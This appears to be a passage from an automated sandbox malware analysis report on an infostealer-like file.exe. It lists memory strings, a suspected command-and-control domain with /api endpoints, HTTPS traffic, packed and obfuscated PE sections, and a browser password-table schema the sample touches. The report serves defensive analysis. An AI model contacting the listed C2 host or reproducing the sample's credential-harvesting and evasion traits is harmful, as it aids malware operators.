              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, file.exe, 00000000.00000003.2150400482.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124998793.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156730025.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/5
              Source: file.exe, 00000000.00000002.2156730025.0000000000FCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/C~T
              Source: file.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/E
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155625030.0000000001095000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124998793.0000000001095000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155717509.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156940751.0000000001024000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155487590.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074555367.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155758852.0000000001023000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2075150921.00000000010A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api.IL
              Source: file.exe, 00000000.00000003.2155758852.0000000001031000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156940751.0000000001031000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiG
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiPI
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiersionnF
              Source: file.exe, 00000000.00000003.2155745718.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162814769.00000000056F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apitio
              Source: file.exe, 00000000.00000003.2101926012.0000000005703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124794270.00000000056F6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124724016.0000000005704000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113979900.0000000005703000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2162831044.0000000005704000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/c
              Source: file.exe, 00000000.00000003.2075150921.0000000001095000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155414603.000000000108A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074555367.0000000001094000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156988651.000000000108A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/m
              Source: file.exe, file.exe, 00000000.00000003.2155487590.000000000100E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2156847859.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
              Source: file.exe, 00000000.00000002.2156847859.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiicrosoft
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000003.2102002943.000000000570F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101926012.000000000570E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2062528967.000000000572C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2088361896.0000000005810000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01025CF00_3_01025CF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01025CF00_3_01025CF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0104F5220_3_0104F522
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0104F5220_3_0104F522
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0104F5220_3_0104F522
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0104F5220_3_0104F522
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01025CF00_3_01025CF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01025CF00_3_01025CF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061104F0_2_0061104F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006260220_2_00626022
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060E1A00_2_0060E1A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006104600_2_00610460
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006315DC0_2_006315DC
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060F7550_2_0060F755
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061D7F80_2_0061D7F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063B7B00_2_0063B7B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F9D00_2_0062F9D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006279B00_2_006279B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062AB200_2_0062AB20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060EC200_2_0060EC20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063BCA90_2_0063BCA9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E07E0_2_0061E07E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006450400_2_00645040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006350500_2_00635050
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063F0200_2_0063F020
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062702F0_2_0062702F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E30210_2_007E3021
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006010000_2_00601000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006050000_2_00605000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061D0100_2_0061D010
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006230E00_2_006230E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006440E00_2_006440E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063B0F00_2_0063B0F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006070B00_2_006070B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006421650_2_00642165
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D712E0_2_006D712E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006211000_2_00621100
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062A1120_2_0062A112
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006091E90_2_006091E9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060A2600_2_0060A260
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008702900_2_00870290
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060B2400_2_0060B240
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062D2FD0_2_0062D2FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006012D50_2_006012D5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006013280_2_00601328
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006293280_2_00629328
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006453300_2_00645330
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006283E20_2_006283E2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062B3D00_2_0062B3D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062C3A60_2_0062C3A6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006084600_2_00608460
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006344610_2_00634461
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D244A0_2_007D244A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007CD4200_2_007CD420
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006424E00_2_006424E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006114CE0_2_006114CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F5700_2_0062F570
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063A5230_2_0063A523
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006225200_2_00622520
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B952F0_2_007B952F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E550F0_2_007E550F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062A5100_2_0062A510
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006435F00_2_006435F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006165D70_2_006165D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007075BD0_2_007075BD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DC5A90_2_007DC5A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E664F0_2_007E664F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006726840_2_00672684
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006237700_2_00623770
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006437400_2_00643740
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060A7200_2_0060A720
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062F73A0_2_0062F73A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006427000_2_00642700
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063C7A00_2_0063C7A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061E8370_2_0061E837
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063F8000_2_0063F800
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006298F20_2_006298F2
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006308B10_2_006308B1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006308870_2_00630887
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0072E9750_2_0072E975
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006269400_2_00626940
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0074B9450_2_0074B945
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006039300_2_00603930
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006439C00_2_006439C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006169970_2_00616997
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D5A730_2_007D5A73
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007DAA580_2_007DAA58
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00614A4C0_2_00614A4C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061FA4F0_2_0061FA4F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00607AB00_2_00607AB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060DA800_2_0060DA80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00643A900_2_00643A90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00642B100_2_00642B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B3BE30_2_006B3BE3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634BC70_2_00634BC7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062CBD00_2_0062CBD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061FBA00_2_0061FBA0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061CC200_2_0061CC20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062ECE00_2_0062ECE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E1CD10_2_007E1CD1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061ED480_2_0061ED48
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060BD500_2_0060BD50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00606D100_2_00606D10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D0DC10_2_007D0DC1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060ADB00_2_0060ADB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00643D900_2_00643D90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00613E450_2_00613E45
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00633E240_2_00633E24
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00608EF00_2_00608EF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6EFA0_2_006E6EFA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00621EC50_2_00621EC5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00763EB70_2_00763EB7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063AE900_2_0063AE90
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0060DF600_2_0060DF60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639F610_2_00639F61
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D0F550_2_006D0F55
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00630F3E0_2_00630F3E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DCF150_2_006DCF15
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609FF50_2_00609FF5
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8FAE0_2_007D8FAE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00642FB00_2_00642FB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D3FA20_2_007D3FA2
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0060E190 appears 152 times
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 0060C890 appears 69 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.998046875
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00632240 CoCreateInstance,0_2_00632240
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2074641754.000000000572E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062308476.000000000571A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2062632582.00000000056FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeReversingLabs: Detection: 39%
              Source: file.exeVirustotal: Detection: 51%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: file.exeString found in binary or memory: N{WRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNePW
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 3093504 > 1048576
              Source: file.exeStatic PE information: Raw size of vphonoxp is bigger than: 0x100000 < 0x2c7800

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.600000.0.unpack :EW;.rsrc:W;.idata :W;vphonoxp:EW;aljcmtdz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vphonoxp:EW;aljcmtdz:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2f345e should be: 0x2fc12d
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: vphonoxp
              Source: file.exeStatic PE information: section name: aljcmtdz
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0101E307 push eax; iretd 0_3_0101E308
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0101E53B push es; ret 0_3_0101E661
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01037759 push ecx; retn 004Eh0_3_010377F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01037759 push ecx; retn 004Eh0_3_010377F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01037759 push ecx; retn 004Eh0_3_010377F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01037759 push ecx; retn 004Eh0_3_010377F9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00810098 push 57ECD757h; mov dword ptr [esp], ecx0_2_0081010C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E9034 push edx; mov dword ptr [esp], edi0_2_007E917B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push eax; mov dword ptr [esp], ebp0_2_007E30A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push eax; mov dword ptr [esp], 55CF5A86h0_2_007E30D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ecx; mov dword ptr [esp], edx0_2_007E3144
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ebp; mov dword ptr [esp], eax0_2_007E315F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push eax; mov dword ptr [esp], ecx0_2_007E31D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push edx; mov dword ptr [esp], esi0_2_007E31E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 13A07950h; mov dword ptr [esp], esi0_2_007E3242
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ebx; mov dword ptr [esp], edx0_2_007E32FD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 3257F2F7h; mov dword ptr [esp], edi0_2_007E3311
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ebx; mov dword ptr [esp], eax0_2_007E33C4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push edx; mov dword ptr [esp], 7FC00D93h0_2_007E33C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 086EC82Ah; mov dword ptr [esp], ebp0_2_007E347E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 1134A8E2h; mov dword ptr [esp], eax0_2_007E34E4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ecx; mov dword ptr [esp], edx0_2_007E35AF
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ebx; mov dword ptr [esp], 1C8FD066h0_2_007E3656
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ebx; mov dword ptr [esp], edx0_2_007E3662
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ecx; mov dword ptr [esp], 44EA082Ah0_2_007E3740
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 7A0B03C0h; mov dword ptr [esp], eax0_2_007E3772
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 778FA4AAh; mov dword ptr [esp], ebx0_2_007E377B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push eax; mov dword ptr [esp], edx0_2_007E3838
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push 09D06B31h; mov dword ptr [esp], ecx0_2_007E3873
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push edx; mov dword ptr [esp], ebx0_2_007E38AD
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007E3021 push ebx; mov dword ptr [esp], ecx0_2_007E3957
              Source: file.exeStatic PE information: section name: entropy: 7.978424243223096

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
